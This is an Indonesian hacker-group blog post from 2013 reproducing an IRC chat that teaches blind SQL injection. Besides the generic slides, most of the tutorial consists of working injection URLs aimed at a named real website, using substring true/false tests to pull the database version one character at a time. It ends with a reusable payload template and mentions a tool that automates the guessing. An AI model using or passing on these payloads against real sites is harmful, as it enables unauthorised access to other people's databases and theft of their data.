Y00AOebLhlCX59D11qensmHJY7s Tutorial SQL Blind BY home_edition2001 aka bius Created (c) by Princexells Seyka (Princelling Saki)

Minggu, 25 Agustus 2013

0 Tutorial SQL Blind BY home_edition2001 aka bius

Tutorial SQL Blind BY home_edition2001 aka bius

<&home_edition2001> http://www.exploit-db.com/exploits/11325 << sql blind
<&home_edition2001> knapa blind
<&home_edition2001> karena fungsi union ga jalan
<&home_edition2001> gw mengacu ke dasar sql blind
<&home_edition2001> wait
<&home_edition2001> 5. What is blind SQL injection?
<&home_edition2001> * Same vulnerability as SQL injection
<&home_edition2001> * *Very* common vulnerability
<&home_edition2001> * Sometimes (wrongly) ignored during tests as unexploitable or not detected
<&home_edition2001> * The attacker can not retrieve results
<&home_edition2001> * The attacker can only retrieve a True/False condition
<&home_edition2001> blind sama kek sql injek
<&home_edition2001> tapi blind ga munculin result
<&home_edition2001> 6. Blind SQL injection example
<&home_edition2001> * http://victim/showproduct.asp?id= 238
<&home_edition2001> * SELECT * from PRODUCTS WHERE id= 238
<&home_edition2001> * Sometimes, due to the code surronding the SQL query (grouped or sorted) the attacker can't UNION and no 'good' ways of exploitation are found
<&home_edition2001> * http://victim/showproduct.asp?id= 238 and 1=1
<&home_edition2001> * http://victim/showproduct.asp?id= 238 and 1=2
<&home_edition2001> * SELECT * from PRODUCTS WHERE id= 238 and 1=1
<&home_edition2001> * SELECT * from PRODUCTS WHERE id= 238 and 1=2
<&home_edition2001> * Blind SQL happens if the requests above return different results
<&home_edition2001> <&home_edition2001> * Sometimes, due to the code surronding the SQL query (grouped or sorted) the attacker can't UNION and no 'good' ways of exploitation are found << look this
<&home_edition2001> klo dah mentok ga bisa union hajar pake blind
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,1,1)=5 << true
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,1,1)=4 << false
<&home_edition2001> nah berarti dia versi 5 kan
<&home_edition2001> 5.xxxxxx
<&home_edition2001> nah gimana nebak next karakternya
<&home_edition2001> nah dia punya format khusus buat sql blind
<&home_edition2001> makanya sql blind nge atacknya pake loopinhg dari a-z trus dari 1-9
<&home_edition2001> 5.1.28-rc-community   << format standart untuk versi sql
<&home_edition2001> kita baru dapet angka 5 nya doank
<&home_edition2001> setelah 5 udah pasti titik kan
<&home_edition2001> nah untuk selanjutnya kita nebak karakter ke 3
<&home_edition2001> nah setelah titik berarti kita nebak karakter ke tiga
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,posisi,1)=nilai <<ni standart sql blind
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,3,1)=0 << true
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,3,1)=1 << false
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,3,1)=2 << false
<&home_edition2001> berartri dah dapet 3 karakter kan
<&home_edition2001> 5.0
<&home_edition2001> lanjut ke karakter ke 4
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,4,1)=0 << true lagi
<&home_edition2001> 7. Exploiting True/False conditions
<&home_edition2001> * Select user returns 'dbo'
<&home_edition2001> * SUBSTRING('Select user', 1, 1) = 'd'
<&home_edition2001> * SUBSTRING('Select user', 2, 1) = 'b'
<&home_edition2001> * SUBSTRING('Select user', 3, 1) = 'o'
<&home_edition2001> * http://victim/showproduct.asp?id= 238 and SUBSTRING('Select user', 1, 1) = 'd' TRUE
<&home_edition2001> * http://victim/showproduct.asp?id= 238 and SUBSTRING('Select user', 1, 1) = 'X' FALSE
<&home_edition2001> * Select user returns 'dbo'
<&home_edition2001> * SUBSTRING('Select user', 1, 1) = 'd'
<&home_edition2001> * SUBSTRING('Select user', 2, 1) = 'b'
<&home_edition2001> * SUBSTRING('Select user', 3, 1) = 'o'
<&home_edition2001> tu perhatiin
<&home_edition2001> usernya namanya dbo
<&home_edition2001> kita nebak per posisi
<&home_edition2001> 1,1 << karakter 1
<&home_edition2001> 2,1 << karakter ke dua
<&home_edition2001> 3,1 karakter ke 3
<&home_edition2001> nah klo pake qxploit dia otomatis testing dari 1-9 a-z
<&home_edition2001> jadi tinggal nunggu hasil
<&home_edition2001> jadi bisa disimpulkan
<&home_edition2001> dari sql blind
<&home_edition2001> SUBSTRING('query sql', posisi, 1) = 'tebakan lo'

Dedicated to #nyubicrew
Powered by Mildnet


Artikel Terkait

Ditulis Oleh : Nyubi Crew

Artikel Tutorial SQL Blind BY home_edition2001 aka bius ini ditulis oleh Nyubi Crew pada hari Minggu, 25 Agustus 2013. Terimakasih atas kunjungan Anda pada blog ini. Kritik dan saran tentang Tutorial SQL Blind BY home_edition2001 aka bius dapat Anda sampaikan melalui kotak komentar diatas.